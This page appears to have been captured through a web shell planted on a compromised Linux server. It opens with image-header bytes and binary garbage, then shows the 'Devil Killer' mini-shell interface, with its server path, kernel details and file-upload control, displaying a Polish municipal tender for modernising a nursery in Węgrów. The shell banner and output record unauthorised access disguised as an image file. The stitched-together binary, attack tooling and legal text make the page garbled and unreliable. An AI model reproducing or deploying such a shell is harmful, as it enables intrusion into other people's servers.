JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230406/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230406/0016672501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja Żłobka Miejskiego w Węgrowie (II podejście) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Węgrów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711582233</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek Mariacki 16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Węgrów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">07-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL925 - Siedlecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@wegrow.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.wegrow.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja Żłobka Miejskiego w Węgrowie (II podejście) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f091ecad-d2b2-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00166725</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00063590/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Modernizacja Żłobka Miejskiego w Węgrowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f091ecad-d2b2-11ed-9355-06954b8c6cb9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która<br/>jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego poprzez formularz udostępniony na stronie internetowej<br/>https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>przetargi@wegrow.com.pl (nie dotyczy składania ofert).<br/>Szczegółowe wymagania techniczne i organizacyjne dot. korespondencji elektronicznej znajdują się w punkcie 13 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zapisy dotyczące RODO :<br/>Zgodnie z art. 13 ust. 1 i 2 oraz art. 14 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w<br/>sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej<br/>„RODO”, informuję, że:<br/>􀀀 administratorem Pani/Pana danych osobowych jest Urząd Miejski w Węgrowie ul. Rynek Mariacki 16 07-100 Węgrów tel. 25 308<br/>12 00, email: przetargi@wegrow.com.pl*<br/>􀀀 inspektorem ochrony danych osobowych w Urzędzie Miejskim w Węgrowie jest Pani/Pani Michał Zajdowicz prowadzący<br/>działalność gospodarczą pod nazwą PHAROS Michał Zajdowicz ul. Strzeszyńska 251/10, 60-479 Poznań Tel. 505 156 508 email<br/>wegrow@twoj-abi.pl<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z postępowaniem o udzielenie zamówienia publicznego pn. „Modernizacja Żłobka Miejskiego w Węgrowie”( II podejście) prowadzonym w trybie<br/>podstawowym na podstawie art. 275 pkt 1 ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych<br/>􀀀 odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18, 19 ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych dalej „ustawa Pzp”;<br/>􀀀 Pani/Pana dane osobowe będą przechowywane przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a<br/>jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>􀀀 obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>􀀀 w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>􀀀 posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>􀀀 nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać<br/>integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FEiZP.271.1.1.2023 (II podejście)</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie pełno branżowej dokumentacji projektowo-kosztorysowej oraz wykonanie robót budowlanych polegających na przebudowie części pomieszczeń oraz zmianie sposobu użytkowania (II kondygnacji ) obiektu byłej szkoły na żłobek miejski w formie „zaprojektuj i wybuduj” przy ul. Szerokiej w Węgrowie. Zakres prac projektowych obejmuje budynek żłobka wraz z infrastrukturą towarzyszącą, dojazdami i parkingami, dojściami, instalacjami i sieciami w zakresie niezbędnym do prawidłowego funkcjonowania obiektu oraz uzyskanie wszelkich niezbędnych warunków, decyzji i uzgodnień umożliwiających uzyskanie pozwolenia na użytkowanie. Należy stwierdzić , że liczba parkingów w chwili opracowania PFU jest wystarczająca do obsługi obiektu, ale nie można wykluczyć, że na etapie opracowania projektu nie nastąpi zmiana co do wymagań dla np. miejsc parkingowych i opracowujący dokumentację będzie musiał to uwzględnić w swoim opracowaniu – co będzie się również wiązało z ich realizacją. Zamiarem zamawiającego jest uzyskanie obiektu przystosowanego do pełnienia zadanej funkcji, obiektu przyjaznego dzieciom, wraz z zagospodarowaniem terenu, obejmującym rozbudowę placu zabaw.<br/>Budynek musi spełniać wymagania obowiązujących norm i przepisów, szczególnie w zakresie bezpieczeństwa, ochrony przeciwpożarowej, wymagań higieniczno-sanitarnych oraz dostępności dla osób niepełnosprawnych oraz musi spełniać zasady uniwersalnego projektowania.<br/>Jeśli w trakcie realizacji inwestycji przepisy ulegną zmianie co spowoduje konieczność zmiany projektu bądź przygotowania dodatkowych dokumentów do odbiorów bądź prowadzenia zmian w budynku, wykonawca powinien uwzględnić te zmiany w ramach zamówienia i wykonać niezbędne prace na swój koszt.<br/>Zakres prac:<br/>- Etap 1 Wykonanie kompleksowej dokumentacji projektowo – kosztorysowej w oparciu o program funkcjonalno-użytkowy i ekspertyzę techniczną<br/>- Etap 2 Kompleksowe wykonanie prac budowlanych w oparciu o program funkcjonalno-użytkowy oraz o dokumentację projektowo – kosztorysową z etapu I<br/>- Etap 3 Wykonanie dokumentacji powykonawczej oraz przekazanie do eksploatacji.<br/><br/>W ramach realizacji przedmiotu zamówienia należy wykonać również:<br/>wszelkie prace pomocnicze i towarzyszące, które są konieczne do prawidłowego wykonania robót ujętych w kosztorysie, w tym prace wynikające ze specyfikacji technicznych i dokumentacji projektowej,<br/>wszelkie inne roboty, prace, badania (laboratoryjne), czynności, obowiązki <br/>i wymogi wynikające z niniejszej specyfikacji (umowy, specyfikacji technicznej, dokumentacji projektowej, przedmiaru robót), obsługa geodezyjna, powykonawcza inwentaryzacja geodezyjna, projekt organizacji robót. <br/>W sprawach nieuregulowanych w niniejszej specyfikacji należy stosować się do obowiązujących warunków technicznych wykonania i odbioru robót budowlanych, Polskich Norm oraz Norm Europejskich, o ile takie obowiązują w Polsce, przepisów prawa budowlanego.<br/><br/>Zaleca się aby Wykonawca zapoznał się z terenem wskazanym w SWZ, na którym będą prowadzone prace oraz do zdobycia wszelkich informacji, które mogą być konieczne do przygotowania oferty. Wykonawca poniesie wszelkie koszty związane z przygotowaniem i złożeniem oferty. <br/>Wykonawca zobowiązany jest do ponoszenia odpowiedzialności za szkody oraz następstwa nieszczęśliwych wypadków dotyczących pracowników i osób trzecich a powstałych w związku z prowadzonymi robotami, w tym także ruchem pojazdów mechanicznych. W tym celu wskazane jest, aby wykonawca ubezpieczył prowadzoną działalność od odpowiedzialności cywilnej, zabezpieczył plac budowy oraz oznakował roboty w pasie drogowym zgodnie z Rozp. Ministra Infrastruktury z dnia 23 września 2003 r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzeniem ( t.j. Dz. U. Nr 2017 poz. 784 z dnia 24 marca 2017 r.).<br/><br/>Uwaga<br/>Wykonawca jest zobowiązany do:<br/>1.	Przedłożenia harmonogramu rzeczowo – finansowego wykonania robót,<br/>2.	Kosztorysu powykonawczego przed zakończeniem zadania.<br/>3.	Wykonawca jest zobowiązany do zapewnienia ciągłości działania żłobka uwzględniając czas pracy żłobka oraz specyfikę obiektu.<br/><br/>Zadanie dofinansowane jest z Rządowego Funduszu Polski Ład: Programu Inwestycji Strategicznych (edycja trzecia – PGR). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-08-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na całość przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają określone przez<br/>zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową na kwotę minimum 800 000 zł /słownie: osiemset<br/>tysięcy złotych 0/100/. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonych dokumentów tj.<br/>Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków<br/>finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>4) zdolności technicznej lub zawodowej:<br/>a) dotyczącej Wykonawcy:<br/>Wykonawca musi posiadać doświadczenie polegające na wykonaniu zgodnie z zasadami sztuki budowlanej i prawidłowo<br/>ukończonych w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:<br/>-2 projektów budowlanych budynków użyteczności publicznej zgodnie z kategorią obiektów IX, XI, XII o wartości łącznej 100<br/>000,00 zł (brutto)<br/>i<br/>- 2 robót budowlanych polegających na budowie, przebudowie, budynków o powierzchni użytkowej (łącznie min. 290 m2)<br/>wraz z instalacją elektryczną i sanitarną. Wartość brutto wskazanych robót budowlanych musi wynosić co najmniej 1 500<br/>000,00 zł (brutto) łącznie.<br/>Powyższy warunek wiedzy i doświadczenia należy wykazać łącznie<br/>Lub<br/>w przypadku wykazania doświadczenia w formie zaprojektuj i wybuduj warunek uznaje się za spełniony, jeśli Wykonawca<br/>wykaże, że wykonał 2 przedsięwzięcia polegające na zaprojektowaniu budynków użyteczności publicznej zgodnie z<br/>kategorią obiektów IX, XI, XII i wybudowaniu, przebudowaniu, budynków o powierzchni użytkowej (łącznie min. 290 m2)<br/>wraz z instalacją elektryczną i sanitarną. Wartość brutto wskazanych przedsięwzięć musi wynosić co najmniej 1 500 000,00<br/>zł (brutto) łącznie.<br/>UWAGA:<br/>1. Wykazując spełnianie warunku udziału w postępowaniu w wykazie robót i usług należy podać wartość wykonanych robót<br/>w celu weryfikacji spełniania warunku udziału w postępowaniu.<br/>2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia lub korzystania<br/>z zasobów podmiotów trzecich na podstawie art. 118 pzp minimum jeden z wykonawców lub jeden podmiot udostępniający<br/>zasoby musi posiadać pełne doświadczenie odpowiednio do usług projektowych lub robót budowlanych lub pełnego zakresu<br/>w formule zaprojektuj i wybuduj.<br/>3. Wartości podane w dokumentach potwierdzających spełnienie warunku w walutach innych niż wskazane przez<br/>Zamawiającego Wykonawca przeliczy wg średniego kursu NBP na dzień zawarcia umów o ich wykonanie.<br/>b) dotyczącej osób:<br/>Wykonawca musi dysponować następującymi osobami zdolnymi do wykonywania zamówienia:<br/>1. Zespół projektowy<br/>a) Projektant główny staż pracy co najmniej 5 lat od dnia uzyskania uprawnień - uprawnienia budowlane umożliwiające<br/>projektowanie w specjalności architektonicznej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które<br/>zostały wydane na podstawie wcześniej obowiązujących przepisów prawa - osoba ta musi należeć do właściwej Izby<br/>Inżynierów Budownictwa<br/>b) Projektant branży konstrukcyjno – budowlanej staż pracy co najmniej 5 lat od dnia uzyskania uprawnień - uprawnienia<br/>budowlane umożliwiające projektowanie w specjalności konstrukcyjno – budowlanej bez ograniczeń lub odpowiadające im<br/>ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa - osoba ta<br/>musi należeć do właściwej Izby Inżynierów Budownictwa<br/>c) Projektant branży sanitarnej staż pracy co najmniej 5 lat od dnia uzyskania uprawnień budowlanych umożliwiających<br/>projektowanie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,<br/>wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały<br/>wydane na podstawie wcześniej obowiązujących przepisów prawa - osoba ta musi należeć do właściwej Izby Inżynierów Budownictwa<br/>d) Projektant branży elektrycznej staż pracy co najmniej 5 lat od dnia uzyskania uprawnień- uprawnienia budowlane<br/>umożliwiające projektowanie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na<br/>podstawie wcześniej obowiązujących przepisów prawa - osoba ta musi należeć do właściwej Izby Inżynierów Budownictwa<br/>2. Zespół wykonawczy:<br/>a) Kierownik budowy z co najmniej 5-letnim stażem - minimalne wymagania:<br/>- uprawnienia budowlane umożliwiające kierowanie robotami budowlanymi w specjalności konstrukcyjno – budowlanej bez<br/>ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów prawa - osoba ta musi należeć do właściwej Izby Inżynierów Budownictwa.<br/>b) Kierownik robót sanitarnych z co najmniej 5-letnim stażem - minimalne wymagania:<br/>- uprawnienia budowlane umożliwiające kierowanie robotami budowlanymi w specjalności 